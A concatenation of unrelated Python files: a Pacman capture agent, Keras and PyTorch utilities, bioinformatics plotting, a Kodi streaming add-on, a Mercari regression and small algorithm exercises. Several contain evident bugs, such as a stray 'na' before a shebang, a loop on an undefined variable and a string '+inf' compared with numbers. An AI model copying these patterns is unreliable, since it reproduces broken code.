actions.remove(Directions.STOP)
current_direction = new_state.getAgentState(self.index).configuration.direction
# The agent should not use the reverse direction during simulation
reversed_direction = Directions.REVERSE[new_state.getAgentState(self.index).configuration.direction]
if reversed_direction in actions and len(actions) > 1:
actions.remove(reversed_direction)
# Randomly chooses a valid action
a = random.choice(actions)
# Compute new state and update depth
new_state = new_state.generateSuccessor(self.index, a)
depth -= 1
# Evaluate the final simulation state
return self.evaluate(new_state, Directions.STOP)
def __init__(self, index):
CaptureAgent.__init__(self, index)
# Variables used to verify if the agent os locked
# self.numEnemyFood = "+inf"
# self.inactiveTime = 0
# Implemente este metodo para pre-processamento (15s max).
def registerInitialState(self, gameState):
CaptureAgent.registerInitialState(self, gameState)
# get the deadends of the map
self.deadEnds = {}
# get the feasible position of the map
self.feasible = []
for i in range(1, gameState.data.layout.height - 1):
for j in range(1, gameState.data.layout.width - 1):
if not gameState.hasWall(j, i):
self.feasible.append((j, i))
# store the crossroads met in the travel
crossRoad = util.Queue()
currentState = gameState
# the entrance of the deadend
entPos = currentState.getAgentPosition(self.index)
entDirection = currentState.getAgentState(self.index).configuration.direction
actions = currentState.getLegalActions(self.index)
print(actions)
actions.remove(Directions.STOP)
for a in actions:
crossRoad.push(currentState.generateSuccessor(self.index, a))
# if there is still some positions unexplored
while not crossRoad.isEmpty():
# if it is not a crossroad nor a deadend
currentState = crossRoad.pop()
depth = 0
entPos = currentState.getAgentState(self.index).getPosition()
entDirection = currentState.getAgentState(self.index).configuration.direction
while True:
# get current position
currentPos = currentState.getAgentState(self.index).getPosition()
# get next actions
actions = currentState.getLegalActions(self.index)
actions.remove(Directions.STOP)
currentDirection = currentState.getAgentState(self.index).configuration.direction
if currentPos not in self.feasible:
break
self.feasible.remove(currentPos)
if Directions.REVERSE[currentDirection] in actions:
actions.remove(Directions.REVERSE[currentDirection])
# deadend
if len(actions) == 0:
self.deadEnds[(entPos, entDirection)] = depth + 1
break
# there is only one direction to move
elif len(actions) == 1:
depth = depth + 1
# generate next state
currentState = currentState.generateSuccessor(self.index, actions[0])
# meet crossroad
else:
# get the successors
for a in actions:
crossRoad.push(currentState.generateSuccessor(self.index, a))
break
for i in self.deadEnds.keys():
print(i, self.deadEnds[i])
self.distancer.getMazeDistances()
if self.red:
centralX = (gameState.data.layout.width - 2) / 2
else:
centralX = ((gameState.data.layout.width - 2) / 2) + 1
self.boundary = []
for i in range(1, gameState.data.layout.height - 1):
if not gameState.hasWall(centralX, i):
self.boundary.append((centralX, i))
def chooseAction(self, gameState):
# You can profile your evaluation time by uncommenting these lines
start = time.time()
# Get valid actions. Staying put is almost never a good choice, so
# the agent will ignore this action.
actions = gameState.getLegalActions(self.index)
actions.remove(Directions.STOP)
fvalues = []
for a in actions:
new_state = gameState.generateSuccessor(self.index, a)
value = 0
# for i in range(1, 31):
# value += self.randomSimulation(3, new_state, 0.8) / 30
# fvalues.append(value)
value += self.allSimulation(1, new_state, 0.8)
fvalues.append(value)
best = max(fvalues)
ties = filter(lambda x: x[0] == best, zip(fvalues, actions))
print(ties)
toPlay = random.choice(ties)[1]
# print("best:",best,toPlay)
print 'eval time for offensive agent %d: %.4f' % (self.index, time.time() - start)
return toPlay
class DefensiveReflexAgent(ReflexCaptureAgent):
"""
A reflex agent that keeps its side Pacman-free. Again,
this is to give you an idea of what a defensive agent
could be like. It is not the best or only way to make
such an agent.
"""
def __init__(self, index):
CaptureAgent.__init__(self, index)
self.target = None
self.lastObservedFood = None
# This variable will store our patrol points and
# the agent probability to select a point as target.
self.patrolDict = {}
def distFoodToPatrol(self, gameState):
"""
This method calculates the minimum distance from our patrol
points to our pacdots. The inverse of this distance will
be used as the probability to select the patrol point as
target.
"""
food = self.getFoodYouAreDefending(gameState).asList()
total = 0
# Get the minimum distance from the food to our
# patrol points.
for position in self.noWallSpots:
closestFoodDist = "+inf"
for foodPos in food:
dist = self.getMazeDistance(position, foodPos)
if dist < closestFoodDist:
closestFoodDist = dist
# We can't divide by 0!
if closestFoodDist == 0:
closestFoodDist = 1
self.patrolDict[position] = 1.0 / float(closestFoodDist)
total += self.patrolDict[position]
# Normalize the value used as probability.
if total == 0:
total = 1
for x in self.patrolDict.keys():
self.patrolDict[x] = float(self.patrolDict[x]) / float(total)
def selectPatrolTarget(self):
"""
Select some patrol point to use as target.
"""
rand = random.random()
sum = 0.0
for x in self.patrolDict.keys():
sum += self.patrolDict[x]
if rand < sum:
return x
# Implemente este metodo para pre-processamento (15s max).
def registerInitialState(self, gameState):
CaptureAgent.registerInitialState(self, gameState)
self.distancer.getMazeDistances()
# Compute central positions without walls from map layout.
# The defender will walk among these positions to defend
# its territory.
if self.red:
centralX = (gameState.data.layout.width - 2) / 2
else:
centralX = ((gameState.data.layout.width - 2) / 2) + 1
self.noWallSpots = []
for i in range(1, gameState.data.layout.height - 1):
if not gameState.hasWall(centralX, i):
self.noWallSpots.append((centralX, i))
# Remove some positions. The agent do not need to patrol
# all positions in the central area.
while len(self.noWallSpots) > (gameState.data.layout.height - 2) / 2:
self.noWallSpots.pop(0)
self.noWallSpots.pop(len(self.noWallSpots) - 1)
# Update probabilities to each patrol point.
self.distFoodToPatrol(gameState)
# Implemente este metodo para controlar o agente (1s max).
def chooseAction(self, gameState):
# You can profile your evaluation time by uncommenting these lines
# start = time.time()
# If some of our food was eaten, we need to update
# our patrol points probabilities.
if self.lastObservedFood and len(self.lastObservedFood) != len(self.getFoodYouAreDefending(gameState).asList()):
self.distFoodToPatrol(gameState)
mypos = gameState.getAgentPosition(self.index)
if mypos == self.target:
self.target = None
# If we can see an invader, we go after him.
x = self.getOpponents(gameState)
enemies = [gameState.getAgentState(i) for i in self.getOpponents(gameState)]
invaders = filter(lambda x: x.isPacman and x.getPosition() != None, enemies)
if len(invaders) > 0:
positions = [agent.getPosition() for agent in invaders]
self.target = min(positions, key=lambda x: self.getMazeDistance(mypos, x))
# If we can't see an invader, but our pacdots were eaten,
# we will check the position where the pacdot disappeared.
elif self.lastObservedFood != None:
eaten = set(self.lastObservedFood) - set(self.getFoodYouAreDefending(gameState).asList())
if len(eaten) > 0:
self.target = eaten.pop()
# Update the agent memory about our pacdots.
self.lastObservedFood = self.getFoodYouAreDefending(gameState).asList()
# No enemy in sight, and our pacdots are not disappearing.
# If we have only a few pacdots, let's walk among them.
if self.target == None and len(self.getFoodYouAreDefending(gameState).asList()) <= 4:
food = self.getFoodYouAreDefending(gameState).asList() \
+ self.getCapsulesYouAreDefending(gameState)
self.target = random.choice(food)
# If we have many pacdots, let's patrol the map central area.
elif self.target == None:
self.target = self.selectPatrolTarget()
# Choose action. We will take the action that brings us
# closer to the target. However, we will never stay put
# and we will never invade the enemy side.
actions = gameState.getLegalActions(self.index)
goodActions = []
fvalues = []
for a in actions:
new_state = gameState.generateSuccessor(self.index, a)
if not new_state.getAgentState(self.index).isPacman and not a == Directions.STOP:
newpos = new_state.getAgentPosition(self.index)
goodActions.append(a)
fvalues.append(self.getMazeDistance(newpos, self.target))
# Randomly chooses between ties.
best = min(fvalues)
ties = filter(lambda x: x[0] == best, zip(fvalues, goodActions))
# print 'eval time for defender agent %d: %.4f' % (self.index, time.time() - start)
return random.choice(ties)[1]
"""
def getFeatures(self, gameState, action):
features = util.Counter()
successor = self.getSuccessor(gameState, action)
myState = successor.getAgentState(self.index)
myPos = myState.getPosition()
# Computes whether we're on defense (1) or offense (0)
features['onDefense'] = 1
if myState.isPacman: features['onDefense'] = 0
# Computes distance to invaders we can see
enemies = [successor.getAgentState(i) for i in self.getOpponents(successor)]
invaders = [a for a in enemies if a.isPacman and a.getPosition() != None]
features['numInvaders'] = len(invaders)
if len(invaders) > 0:
dists = [self.getMazeDistance(myPos, a.getPosition()) for a in invaders]
features['invaderDistance'] = min(dists)
if action == Directions.STOP: features['stop'] = 1
rev = Directions.REVERSE[gameState.getAgentState(self.index).configuration.direction]
if action == rev: features['reverse'] = 1
return features
def getWeights(self, gameState, action):
return {'numInvaders': -1000, 'onDefense': 100, 'invaderDistance': -10, 'stop': -100, 'reverse': -2}
""" |
import cv2
import json
import keras
import os
import tensorflow as tf
from typing import Tuple
from dataset.image_dataset import ImageDataset, ImagePreprocessor
from experiment_logger.loggable import ObjectDict
from keras_scripts.os_wrapper import list_images, list_subfolders
def get_x_shape_from_root_folder(root_folder_path: str):
for subfolder in list_subfolders(root_folder_path):
for img_path in list_images(os.path.join(root_folder_path, subfolder)):
return list(cv2.imread(os.path.join(root_folder_path, subfolder, img_path)).shape)
def prepare_image_dataset_from_root_folder(root_folder_path: str, name: str, img_shape: Tuple[int, int, int], test_portion: float):
datast = ImageDataset.from_root_folder(root_folder_path, name=name)
datast = datast.upsampled()
datast = datast.shuffled()
datast = datast.index_encoded()
datast = datast.onehot_encoded()
if img_shape is not None:
preprocessor = ImagePreprocessor()
preprocessor.reshape_to = img_shape
datast.preprocessor = preprocessor
datast_savepath = os.path.join(root_folder_path, name)
if test_portion:
test, datast = datast.split(test_portion, suffixes=('test', 'train'))
test_savepath = datast_savepath + '_test.json'
datast_savepath = datast_savepath + '_train.json'
with open(test_savepath, 'w') as f:
test_json_dct = test.to_object_dict()
json.dump(test_json_dct, f, indent=4)
with open(datast_savepath, 'w') as f:
datast_json_dct = datast.to_object_dict()
json.dump(datast_json_dct, f, indent=4)
def load_saved_image_dataset(dataset_path: str):
train_savepath = dataset_path + '_train.json'
test_savepath = dataset_path + '_test.json'
with open(train_savepath, 'r') as f:
train = ObjectDict(json.load(f)).to_object()
with open(test_savepath, 'r') as f:
test = ObjectDict(json.load(f)).to_object()
return train, test
def get_highest_model_version_nr(root_path: str, dataset_name: str, model_date):
model_name_date = dataset_name + '_' + str(model_date) + '_'
versions = set()
for filename in os.listdir(root_path):
stem, ext = os.path.splitext(filename)
if not stem.startswith(model_name_date) or ext != '.h5':
continue
maybe_version = stem[len(model_name_date):]
try:
version = int(maybe_version)
except ValueError:
continue
versions.add(version)
return max(versions, default=-1)
def train_model(model, train, epochs: int, save_path: str) -> None:
model.fit(train.X, train.y, epochs=epochs, batch_size=128, validation_split=0.1)
model.save(save_path)
return
def test_model(model, test) -> None:
score = model.evaluate(test.X, test.y, batch_size=128)
print(score)
return
def save_keras_model_as_saved_model(model, pb_model_directory):
builder = tf.saved_model.builder.SavedModelBuilder(pb_model_directory)
signature = tf.saved_model.signature_def_utils.predict_signature_def(inputs={'inputs': model.input}, outputs={'outputs': model.output})
builder.add_meta_graph_and_variables(
sess=keras.backend.get_session(),
tags=[tf.saved_model.tag_constants.SERVING],
signature_def_map={tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY: signature}
)
builder.save() |
"""editing_type_count_by_group
Generating a editing site distribution plot for RESIC
"""
from Experiments.forontiers_jupyter.bar_utils import stacked_bar
import numpy as np
import matplotlib.pyplot as plt
import os
import re
import logging
from typing import Dict,List
from os import listdir
from os.path import isfile, join, dirname
from Utility.generators_utilities import group_generator
from Utility.count_utils import get_line_count
import pandas as pd
from Experiments.forontiers_jupyter.directory_structure_definer import DirectoryStructure,Stages,ConcensusStage,EditTypeStage
def editing_type_count_by_group_plot(lib_name,group_dict:Dict,dirstruct:DirectoryStructure,dict_colors):
"""
Generates a plot showing the editing percent type distribution of a certain group of nodes
:param lib_name: name of original library file
:param group_dict: dict of form {group_name:list_of_nodes_in_group}
:param dirstruct: DirectoryStructure object for this RESIK run
:param dict_colors: Dictionary of the nucleotides combination to his color bin
:return: Populates The directory structure with:
* A summary file showing the editing type distribution per node for each group
* A summary file showing the aggregate editing type distribution for all nodes for each group
* A plot showing the aggregate distribution of editing sites across all groups
"""
group_counts=dict()
# get aggregate counts per group
for group_name,group_nodes in group_dict.items():
# get editing percent pileup and summary file names
editing_percent_pileups=[dirstruct.pathName(lib_name,node,Stages.editing_type_count,EditTypeStage.edit_percent_pileup)
for node in group_nodes ]
summary_files=[dirstruct.pathName(lib_name,node,Stages.editing_type_count,EditTypeStage.file_summary)
for node in group_nodes ]
# calculatte aggregate distribution
aggregate_counts,count_summary,pileup_length=editing_site_count_per_type(editing_percent_pileups,summary_files)
# save it for plot
group_counts[group_name]=aggregate_counts
#output aggregate counts to file
aggregate_summary_file=dirstruct.pathName(lib_name,group_name,Stages.editing_type_count,EditTypeStage.group_distribution_summary)
count_summary.to_csv(aggregate_summary_file)
#output counts per file to file
group_summary_file=dirstruct.pathName(lib_name,group_name,Stages.editing_type_count,EditTypeStage.group_count_summary)
count_summary.to_csv(group_summary_file)
# generating the plot
try:
plt.figure()
group_names=[name for name in group_dict.keys()]
data=pd.concat(aggregate_counts for aggregate_counts in group_counts.values())
data.index=group_names
data=data.transpose()
plt_res, axes = stacked_bar(data, show_values=True, value_format="{:.3f}",
y_label="Percent of sites",size_plot=[18,20],use_dataframe=True,throw_zeros=True,dict_colors=dict_colors)
#puts the ledgends outside of the plot
plt_res.subplots_adjust(right=0.62)
plt_res.legend(loc='center left',bbox_to_anchor=(1, 0.5),handles=axes[::-1])
output_path = dirstruct.pathName(lib_name,None,Stages.editing_type_count,EditTypeStage.plot)
plt_res.savefig(output_path)
plt_res.show()
except:
logging.exception("edit plot failed")
def editing_site_count_per_type(pileup_files, summary_files)->pd.DataFrame:
"""
Generates a dataframe whos rows are the pileup files and columns are the editing type and cell i,j
contains the number of sites with editing type j in pileup i
:param pileup_files: list of path_names for pileup files
:param summary_files: list of summary file for each pileup in pileup_files, according to analyze editing percent
:return: (total_dist,summary,length_of_pileups) where
total_dist: sum of counts per editing change type across all pileups
summary: dataframe as described above
length_of_pileups: vector of number of lines in each pileup file
"""
# get vector of file length
length_of_pileups=[get_line_count(pileup) for pileup in pileup_files]
# get editing type percentages per file
summary_dfs=[load_summary_file_to_df(summary) for summary in summary_files]
#make length of pileups a vector
length_of_pileups=np.array(length_of_pileups).reshape([-1,1])
#concatenate summaries into one big summary
summary=pd.concat(summary_dfs)
# multiply each row in summary by its file length to get absolute site nubmers
absolute_lengths=length_of_pileups*summary.values
summary.iloc[:,:]=np.array(absolute_lengths,dtype=np.int32)
#sum up groups
total_dist=pd.DataFrame(summary.sum(axis=0)).transpose()
total_length=absolute_lengths.sum()
return total_dist,summary,length_of_pileups
def load_summary_file_to_df(summary_file):
#Currently assume only one file summarised in summary file
#TODO fix this
#get first two lines, throw first one with originalk pileup name
with open(summary_file,"r") as fp:
lines=fp.readlines()
if len(lines)==0:
logging.warning(f"{summary_file} has zero lines")
return None
_,edit_percents=lines[:2]
#split by tabs
edit_percents.strip('\n')
edit_percents=re.split('\t|:',edit_percents)
# splits to key,val pairs
keys,vals=zip(*group_generator(edit_percents,n=2))
vals=np.array([float(v) for v in vals])
#put into a df
file_name=os.path.basename(summary_file)
df=pd.DataFrame(vals,index=keys,columns=[file_name])
df=df.transpose()
return df
if __name__=="__main__":
pass
|
from torch import nn
from torchvision.models.resnet import ResNet, Bottleneck
class ResNetEncoder(ResNet):
"""
ResNetEncoder inherits from torchvision's official ResNet. It is modified to
use dilation on the last block to maintain output stride 16, and deleted the
global average pooling layer and the fully connected layer that was originally
used for classification. The forward method additionally returns the feature
maps at all resolutions for decoder's use.
"""
layers = {
'resnet50': [3, 4, 6, 3],
'resnet101': [3, 4, 23, 3],
}
def __init__(self, in_channels, variant='resnet101', norm_layer=None):
super().__init__(
block=Bottleneck,
layers=self.layers[variant],
replace_stride_with_dilation=[False, False, True],
norm_layer=norm_layer)
# Replace first conv layer if in_channels doesn't match.
if in_channels != 3:
self.conv1 = nn.Conv2d(in_channels, 64, 7, 2, 3, bias=False)
# Delete fully-connected layer
del self.avgpool
del self.fc
def forward(self, x):
x0 = x # 1/1
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x1 = x # 1/2
x = self.maxpool(x)
x = self.layer1(x)
x2 = x # 1/4
x = self.layer2(x)
x3 = x # 1/8
x = self.layer3(x)
x = self.layer4(x)
x4 = x # 1/16
return x4, x3, x2, x1, x0
|
import unittest
from metaquantome.util.testutils import testfile, TTEST_SINFO
from metaquantome.util import stat_io
from metaquantome.util.utils import TEST_DIR
from metaquantome.classes.SampleGroups import SampleGroups
from metaquantome.modules.filter import run_filter
from metaquantome.modules.expand import expand
class TestFilter(unittest.TestCase):
def testRead(self):
samp_grps = SampleGroups('{"samp1": "int"}')
infile = testfile('taxonomy_write_simple.tab')
df = stat_io.read_expanded_table(infile, samp_grps)
self.assertIn('Helicobacter', df['taxon_name'].tolist())
def testFilter(self):
intfile = testfile('filt_int.tab')
taxfile = testfile('multiple_tax.tab')
expandfile = testfile('expand_out.tab')
expanded = expand('t', TTEST_SINFO, int_file=intfile, pep_colname_int='peptide', pep_colname_func='peptide',
pep_colname_tax='peptide', data_dir=TEST_DIR, outfile=expandfile, tax_file=taxfile,
tax_colname='lca')
exp_ids = set(expanded['id'])
# no filtering
nofilt = run_filter(expandfile, TTEST_SINFO, ontology=None, mode="t", qthreshold=0, min_child_non_leaf=0,
min_child_nsamp=0, min_peptides=0, min_pep_nsamp=0)
nofilt_ids = set(nofilt['id'])
# make sure that ids are the same when no filtering is done
self.assertSetEqual(nofilt_ids, exp_ids)
# now, require 3 intensities per group. we shouldn't see 1496 or 1870884
filt3 = run_filter(expandfile, TTEST_SINFO, ontology=None, mode="t", qthreshold=3, min_child_non_leaf=0,
min_child_nsamp=0, min_peptides=0, min_pep_nsamp=0)
filt3_ids = set(filt3['id'])
self.assertNotIn(1496, filt3_ids)
self.assertNotIn(1870884, filt3_ids)
if __name__ == '__main__':
unittest.main()
|
# -*- coding: utf-8 -*-
"""
Catch-up TV & More
Copyright (C) 2017 SylvainCecchetto
This file is part of Catch-up TV & More.
Catch-up TV & More is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
Catch-up TV & More is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License along
with Catch-up TV & More; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
"""
# The unicode_literals import only has
# an effect on Python 2.
# It makes string literals as unicode like in Python 3
from __future__ import unicode_literals
from codequick import Route, Resolver, Listitem, utils, Script
from resources.lib.labels import LABELS
from resources.lib import web_utils
from resources.lib import download
from resources.lib.menu_utils import item_post_treatment
import re
import urlquick
# TO DO
# Add info LIVE TV, Replay
URL_ROOT = 'http://zonevideo.telequebec.tv'
URL_LIVE = 'https://player.telequebec.tv/Tq_VideoPlayer.js'
URL_EMISSIONS = URL_ROOT + '/a-z/'
URL_STREAM = 'https://mnmedias.api.telequebec.tv/m3u8/%s.m3u8'
# VideoId
def replay_entry(plugin, item_id, **kwargs):
"""
First executed function after replay_bridge
"""
return list_programs(plugin, item_id)
@Route.register
def list_programs(plugin, item_id, **kwargs):
"""
Build categories listing
- Tous les programmes
- Séries
- Informations
- ...
"""
resp = urlquick.get(URL_EMISSIONS)
root = resp.parse("div", attrs={"class": "list"})
for program_datas in root.iterfind(".//li"):
program_title = program_datas.find('.//a').text
program_url = URL_ROOT + program_datas.find('.//a').get('href')
item = Listitem()
item.label = program_title
item.set_callback(list_videos,
item_id=item_id,
program_url=program_url)
item_post_treatment(item)
yield item
@Route.register
def list_videos(plugin, item_id, program_url, **kwargs):
resp = urlquick.get(program_url)
root = resp.parse()
for video_datas in root.iterfind(".//div[@class='item']"):
video_title = video_datas.find('.//p').text.split(
' / ')[0] + ' - ' + video_datas.find('.//h4').find('.//a').text
video_plot = video_datas.find('.//p').text
video_image = video_datas.find('.//img').get('src')
video_id = video_datas.get('data-mediaid')
item = Listitem()
item.label = video_title
item.art['thumb'] = item.art['landscape'] = video_image
item.info['plot'] = video_plot
item.set_callback(get_video_url,
item_id=item_id,
video_id=video_id)
item_post_treatment(item, is_playable=True, is_downloadable=True)
yield item
@Resolver.register
def get_video_url(plugin,
item_id,
video_id,
download_mode=False,
**kwargs):
final_video_url = URL_STREAM % video_id
if download_mode:
return download.download_video(final_video_url)
return final_video_url
def live_entry(plugin, item_id, **kwargs):
return get_live_url(plugin, item_id, item_id.upper())
@Resolver.register
def get_live_url(plugin, item_id, video_id, **kwargs):
resp = urlquick.get(URL_LIVE)
return 'https:' + re.compile(r'm3U8Url:"(.*?)"').findall(resp.text)[0]
|
num1 = 1
num2 =2
num = num1 + num2
print(num)
i = 5
while i<0:
sum += num
|
na#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Mon Feb 12 22:22:10 2018
@author: sudhir
"""
# =============================================================================
# Import packages
# =============================================================================
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import missingno as msno
import time
from sklearn.linear_model import LinearRegression, Ridge
from sklearn.model_selection import KFold, train_test_split
from sklearn.feature_extraction.text import TfidfVectorizer,CountVectorizer
from sklearn.preprocessing import LabelEncoder,LabelBinarizer
from scipy.sparse import hstack, csc_matrix
from nltk.corpus import stopwords
import re
import gc
seed = 321
# =============================================================================
# Read data set
# =============================================================================
start_time = time.time()
#path ='../input/'
path = 'file/'
train = pd.read_csv(path+'train.tsv',sep='\t',nrows=None)
test = pd.read_csv(path+'test.tsv',sep='\t',nrows=None)
print('Number of rows and columns in train data set is :',train.shape)
print('Number of rows and columns in teset data set is :',test.shape)
NUM_BRANDS = 4500
NUM_CATEGORIES = 1290
NAME_MIN_Df = 10
MAX_FEAT_DESCP = 50000
nrow_train = train.shape[0]
y = np.log1p(train['price'])
submit = pd.DataFrame( {'test_id':test['test_id']})
df = pd.concat([train,test])
# =============================================================================
# Evaluvation mertic
# =============================================================================
def rmsle(y_true,y_pred):
assert len(y_true) == len(y_pred)
return np.square(np.log(y_pred + 1) - np.log(y_true + 1)).mean() ** 0.5
# =============================================================================
# data analysis
# =============================================================================
train.head()
test.head()
train.describe(include='all').T
test.describe(include='all').T
k = pd.DataFrame()
k['train'] = train.isnull().sum()
k['test'] = test.isnull().sum() ;k
# =============================================================================
# Feature engineering
# =============================================================================
def missing_data(d):
d['brand_name'].fillna(value='missing',inplace = True )
d['item_description'].fillna(value='missing',inplace = True )
d['general_cat'].fillna(value='missing',inplace = True )
d['subcat_1'].fillna(value='missing',inplace = True )
d['subcat_2'].fillna(value='missing',inplace = True )
def split_cat(text):
try:
return text.split('/')
except:
return ('No Label','No Label','No Label')
def cutting_data(d):
#Cutting data set
pop_brands = d['brand_name'].value_counts().loc[lambda x: x.index !='missing'].index[:NUM_BRANDS]
d.loc[~d['brand_name'].isin(pop_brands),'brand_name'] = 'missing'
pop_category = df['general_cat'].value_counts().loc[lambda x: x.index !='missing'].index[:NUM_CATEGORIES]
pop_category = df['subcat_1'].value_counts().loc[lambda x: x.index !='missing'].index[:NUM_CATEGORIES]
pop_category = df['subcat_2'].value_counts().loc[lambda x: x.index !='missing'].index[:NUM_CATEGORIES]
d.loc[~d['general_cat'].isin(pop_category),'general_cat'] = 'missing'
d.loc[~d['subcat_1'].isin(pop_category),'subcat_1'] = 'missing'
d.loc[~d['subcat_2'].isin(pop_category),'subcat_2'] = 'missing'
def category_variable(d):
# Convert to categorical variable
d['brand_name'] = d['brand_name'].astype('category')
d['item_condition_id'] = d['item_condition_id'].astype('category')
d['general_cat'] = d['general_cat'].astype('category')
d['subcat_1'] = d['subcat_1'].astype('category')
d['subcat_1'] = d['subcat_1'].astype('category')
df['general_cat'], df['subcat_1'], df['subcat_2'] = \
zip(*df['category_name'].apply(lambda x: split_cat(x)))
print("[{}] Finished split category".format(time.time()-start_time))
missing_data(df)
print('[{}] Finshed handling missing value '.format(time.time()-start_time))
cutting_data(df)
print('[{}] Fininshed cutting'.format(time.time()-start_time))
category_variable(df)
print('[{}] Finished converting to category'.format(time.time()-start_time))
cv = CountVectorizer(min_df=NAME_MIN_Df)
X_name = cv.fit_transform(df['name'])
print('[{}] Finished count vector name'.format(time.time()-start_time))
cv = CountVectorizer(min_df=NAME_MIN_Df)
X_general = cv.fit_transform(df['general_cat'])
X_subcat_1 = cv.fit_transform(df['subcat_1'])
X_subcat_2 = cv.fit_transform(df['subcat_2'])
print('[{}] Finished count category name'.format(time.time()-start_time))
tv = TfidfVectorizer(max_features=MAX_FEAT_DESCP, stop_words='english',
lowercase=True,analyzer='word', dtype=np.float32,
ngram_range=(1,3))
X_desciption = tv.fit_transform(df['item_description'])
print('[{}] Finished TFIDF vector name'.format(time.time()-start_time))
lb = LabelBinarizer(sparse_output=True)
X_brand = lb.fit_transform(df['brand_name'])
print('[{}] Finished label binarizer brand name'.format(time.time()-start_time))
X_dummies = csc_matrix(pd.get_dummies(df[['item_condition_id','shipping']],
sparse=True).values)
print("[{}] Finished to dummies on 'item_condition_id','shipping'".format(time.time()-start_time))
sparse_df = hstack((X_brand, X_general, X_subcat_1, X_subcat_2, X_desciption, X_name,X_dummies)).tocsr()
print("[{}] Finished to sparse".format(time.time()-start_time))
X = sparse_df[:nrow_train]
X_test = sparse_df[nrow_train:]
# =============================================================================
# MOdel
# =============================================================================
rdg_model = Ridge(solver='sag',fit_intercept=True, random_state = seed)
rdg_model.fit(X,y)
print("[{}] Finished to train Ridge".format(time.time()-start_time))
pred = rdg_model.predict(X_test)
print("[{}] Finished to predict Ridge".format(time.time()-start_time))
# =============================================================================
# Submission
# =============================================================================
#pred = np.abs(pred)
submit = pd.DataFrame({'test_id':test['test_id'],'price':np.expm1(pred)})
#submit.to_csv('mercari.csv.gz',index=False,compression='gzip')
submit.to_csv('mercari.csv',index=False)
submit.head() |
import sys
from transformers import AutoTokenizer
def preprocess(dataset, destination, model_name_or_path, max_len):
subword_len_counter = 0
tokenizer = AutoTokenizer.from_pretrained(model_name_or_path)
destination_file = open(destination, 'w', encoding='utf-8')
with open(dataset, "r", encoding='utf-8') as f_p:
for line in f_p:
line = line.rstrip()
if not line:
destination_file.write(line + '\n')
subword_len_counter = 0
continue
token = line.split()[0]
current_subwords_len = len(tokenizer.tokenize(token))
# Token contains strange control characters like \x96 or \x95
# Just filter out the complete line
if current_subwords_len == 0:
continue
if (subword_len_counter + current_subwords_len) > max_len:
destination_file.write('\n%s\n' % line)
subword_len_counter = 0
continue
subword_len_counter += current_subwords_len
destination_file.write(line + '\n')
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 25 12:26:35 2019
@author: Caio
"""
def newton_method(number, number_iters = 500):
a = float(number) # number to get square root of
for i in range(number_iters): # iteration number
number = 0.5 * (number + a / number) # update
# x_(n+1) = 0.5 * (x_n +a / x_n)
return number
print (newton_method(9))
print (newton_method(2))
|
import add1
def comp(ke):
lit = '00000000000000000000000000000001'
ke=list(ke)
for x in range(len(ke)):
if ke[x] == '0':
ke[x]='1'
elif ke[x] == '1':
ke[x] = '0'
ke = ''.join(ke)
ke = add1.add(ke,lit)
#ke = bin(int(ke,2) + int(lit,2))[2:].zfill(32)
return ke |
from __future__ import absolute_import
import logging
from pprint import pformat
from tornado.options import define, options, parse_command_line
from celery.bin.base import Command
from . import settings
from .app import Flower
define("port", default=5555, help="run on the given port", type=int)
define("address", default='', help="run on the given address", type=str)
define("debug", default=False, help="run in debug mode", type=bool)
define("inspect", default=True, help="inspect workers", type=bool)
define("inspect_timeout", default=1000, type=float,
help="inspect timeout (in milliseconds)")
define("auth", default='', type=str,
help="comma separated list of emails to grant access")
define("url_prefix", type=str, help="base url prefix")
class FlowerCommand(Command):
def run_from_argv(self, prog_name, argv=None):
app_settings = settings.APP_SETTINGS
argv = filter(self.flower_option, argv)
parse_command_line([prog_name] + argv)
auth = map(str.strip, options.auth.split(',')) if options.auth else []
app_settings['debug'] = options.debug
if options.url_prefix:
prefix = options.url_prefix.strip('/')
app_settings['static_url_prefix'] = '/{0}/static/'.format(prefix)
settings.URL_PREFIX = prefix
settings.CELERY_INSPECT_TIMEOUT = options.inspect_timeout
flower = Flower(celery_app=self.app, auth=auth, **app_settings)
logging.info('Visit me at http://%s:%s' %
(options.address or 'localhost', options.port))
logging.info('Broker: %s', self.app.connection().as_uri())
logging.debug('Settings: %s' % pformat(app_settings))
try:
flower.start(options.port, address=options.address,
inspect=options.inspect)
except (KeyboardInterrupt, SystemExit):
pass
def handle_argv(self, prog_name, argv=None):
return self.run_from_argv(prog_name, argv)
@staticmethod
def flower_option(arg):
name, _, value = arg.lstrip('-').partition("=")
name = name.replace('-', '_')
return name in options
|
# -*- coding: utf-8 -*-
# @Time : 2017/12/5 18:15
# @Author : Zhiwei Yang
# @File : bucket_sort.py.py
def bucket_sort(nums):
max_number = max(nums)
bucket = [0] * (max_number + 1)
for i in nums:
bucket[i] += 1
print(bucket)
sort_nums = []
for j in range(len(bucket)):
if bucket[j] >= 1: # nums可能有重复数字, 所以在桶排序里面,数字大于1的需要循环取出, 数字等于1,range一下问题不大
for i in range(bucket[j]):
sort_nums.append(j)
return sort_nums
if __name__ == '__main__':
_nums = [5, 6, 6, 6, 2, 1, 65, 9]
print(bucket_sort(_nums))
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
# FEDERAL UNIVERSITY OF UBERLANDIA
# Faculty of Electrical Engineering
# Biomedical Engineering Lab
# ------------------------------------------------------------------------------
# Author: Italo Gustavo Sampaio Fernandes
# Contact: italogsfernandes@gmail.com
# Git: www.github.com/italogfernandes
# ------------------------------------------------------------------------------
# Description:
# ------------------------------------------------------------------------------
from ArduinoEMGPlotter import ArduinoEMGPlotter
import numpy as np
import scipy as sp
import sys
if sys.version_info.major == 3:
# PyQt5
from PyQt5.QtWidgets import *
from views import base_qt5 as base
from PyQt5 import QtCore
# from PyQt5.QtCore import SIGNAL
from views import config_processamento_qt5 as config_window
elif sys.version_info.major == 2:
# PyQt4
from PyQt4.QtGui import *
